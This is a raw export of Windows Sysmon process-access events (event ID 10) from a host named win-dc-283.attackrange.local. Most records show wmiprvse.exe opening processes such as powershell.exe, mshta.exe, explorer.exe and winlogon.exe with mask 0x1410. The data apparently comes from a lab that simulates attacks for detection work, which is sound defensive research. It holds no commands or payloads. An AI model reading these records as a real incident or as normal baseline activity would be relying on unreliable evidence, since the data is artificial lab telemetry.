15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6406-00000000A301}6528C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6306-00000000A301}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5366-6008-6206-00000000A301}4488C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.506{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 